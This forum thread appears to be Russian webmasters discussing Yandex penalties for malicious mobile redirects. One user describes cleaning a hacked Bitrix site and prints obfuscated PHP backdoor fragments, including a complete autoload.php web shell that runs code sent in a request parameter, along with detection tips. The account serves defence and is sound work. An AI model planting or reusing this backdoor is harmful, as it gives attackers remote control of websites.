Такая же метка недавно пришла.
Грешу только на Адсенс. Надо искать и блокировать вручную объявления рекламодателей, которые перекидывают на подписки, но это же не выход из ситуации.
Не факт, но может быть. У меня на сайте нет вообще никаких рекламных модулей.. Только счетчики яндекс и гугл. Переадресация вредоносным кодом у меня была (описал все выше и как искал тоже)
От куда он появился на сервере так и не понял - провожу наблюдения пытаясь вычислить дыру. Отчасти закрадываются подозрения на счетчики, но маловероятно конечно....
Ну видимо у многих "дыра на сайте" и эти многие не подозревают об этом, раз это тема возникла, а я просто пытаюсь помочь людям в поиске, а не просто сидеть и давить на кнопку "Я все исправил"...
Сразу извиняюсь за много букв, но думаю это будет полезно многим в поисках....
Слушайте и держитесь! Возможно кому-то помогу в поиске проблемы и отлова этих редиректов. Сам борюсь уже с июня этого года. В начале так же ничего не понимал куда копать и где искать...
Так же писал в поддержку яндекса и так же отвечали. Забегая вперед нашел вредный код, удалил и ограничения снимали примерно недели через 2 после нажатия на кнопку "Исправил", но через какое-то время код вновь появлялся и санкции вновь накладывались от яндекса... уже в 3-й раз жду снятия санкций.......
Итак по порядку: реально своими глазами можно увидеть редирект (но не всегда срабатывает) только при использовании мобильного интернета (через WiFi не работает). Так же нужно полностью очистить всю историю (я для этого использовал встроенный браузер андройда).
Где нашел сам редирект: в битриксе в первой строке header.php, этот файл грузится на всех страницах сайта. На вашей системе ищите где может быть.... (причем на локальной копии (с которой работаю) все было норм - изменения произошли на сервере - это я так сразу исключил какой-то вирус у себя..... По времени изменения файла по логам уже было не отследить как и кто его изменил...
Далее через неделю строка появилась снова, и стал смотреть логи... И как вычислил по логам, где-то в глубине был закопан php скрипт, который (как я полагаю) запускался в ручную (точнее там даже форма в которую что-то вводится и которая что-то делает далее). PHP Код очень хитроумный и фильтрами его сложно отловить - все функции собираются из огромного словаря символов.. вот пример кода который уже обрабатывал форму:
if (isset($_POST['d42'])) $sddas = "*".$_POST['d42'].'*'."\r\n";
$f12='b'.$U.$T.$S.'64'.$J.'d'.$S.$R.'od'.$S;
$f23=$T.'t'.$M.$J.$M.$S.'p'.$A.$U.$R.$S;
$f37=$T.$S.'t'.$R.'ooki'.$S;
$f43='gzinf'.$A.$U.'t'.$S;
$f50=$R.$M.$S.$U.'t'.$S.$J.'fun'.$R.'tion';
$f60='mb'.$J.$T.'ub'.$T.'t'.$M;
$f78='mb'.$J.$T.'t'.$M.$A.$S.'n';
$f88='md5';
$f95=$T.'h'.$U.'1';
$f104='o'.$M.'d';
$f115=$R.'h'.$M;
далее идет огромный словарь символов и пара маленьких функций с циклами перебора этих словарей, а итоговая собранная функция запускалась просто: $k27(); Это по сути текстовая переменная с функцией... И в приведенном примере вы можете в одной переменной собрать "create_function"..
ну в общем я отключил все это дело, поставил контрольки, что бы мне пришло сообщение что пытаются запустить скрипт... ждать пришлось чуть менее недели... пытались запустить скрипт раз 15.. и по логам это тоже было видно.. проверил кода с редиректом не появилось ну думаю на этом все успокоится.. через часа 4 еще раз 10 пытались запустить и на этом все успокоилось... яндекс разбанил и жизнь вроде как наладилась.... но тут опять прилетел бан, опять этот редирект в хидере.. по логам нашел еще такой же файл, но в другом месте... И слушайте, думал вычислить когда он появился, но не тут-то было - фал был создан аж 2015 году - в аккурат когда и соседние фалы в этой папке.... Т.е. оп дате изменения искать не реально.
Все мои мысли как поиском вычислить всю эту заразу я так и не придумал... все функции в скриптах собираются из словарей и потом уже собираются... По ftp логам (за большой период времени) я тоже не смог найти, что бы что-то загружалось похожее, все мои загрузки только.... Поэтому вероятно фалы создавались прямо на сайте и дата изменялась (так исключил загрузку из админки битрикса и загрузку по ftp)...
В общем я нашел на сайте порядка 10 разных фалов подобного содержания. Искал исключительно сравнивая резервную копию сайта очень старой и текущей версии....
И так еще несколько наводящего, что можно искать:
1. несколько фалов (в разных местах) были с именем git.php
2. Так же встретились файлы: jquery.php, css.php, mbstring.php, json.php, plugins.php, components.php - вроде в начале на такие и не обратишь внимание, если не расширение.... Все файлы либо словари, либо что-то вроде строк "\152\x61\x76\141\137\163\x65\163\163\x69\x6f\x6e\137" и создание классов.....
3. Еще фалик с именем "autoload.php" с содержимым: <?php
$TEYFW = "\142\141\163\145" . 576 / 9 . "\137\x64\x65" . "\143\x6f\144\x65"; $mki6B = $TEYFW("\131\63\112\x6c\x59\x58\x52\154\130\62\x5a\61\142\x6d\116\60\x61\x57\x39\165"); if ($rwWwl = $mki6B('', "\162\x65\164\165\162\156\40" . @$_REQUEST["\x61\152\x61\170\137\152\161\165\x65\162\171\137\x31\60"] . "\73")()) { print "\x3c\160\x72\145\x3e"; print_r($rwWwl); }?>
?>
Я так понимаю с помощью него загружались нужные фалы.....
Короче резюмируя - поиском найти сложно, единственное искать по регулярке функции (точнее переменную со скобками) с именем похожим на "$f34()" - буква может быть любой и цифр может другое количество. но этим все не отловите - так я нашел только 2 фала.
Функцию PHP touch искать бесполезно - не нашел ни одного файла. По кускам словарей так же искать бесполезно....
Идеально если у вас есть старая резервная копия и по ней сравнивать с текущей и вычислять измененные файлы.
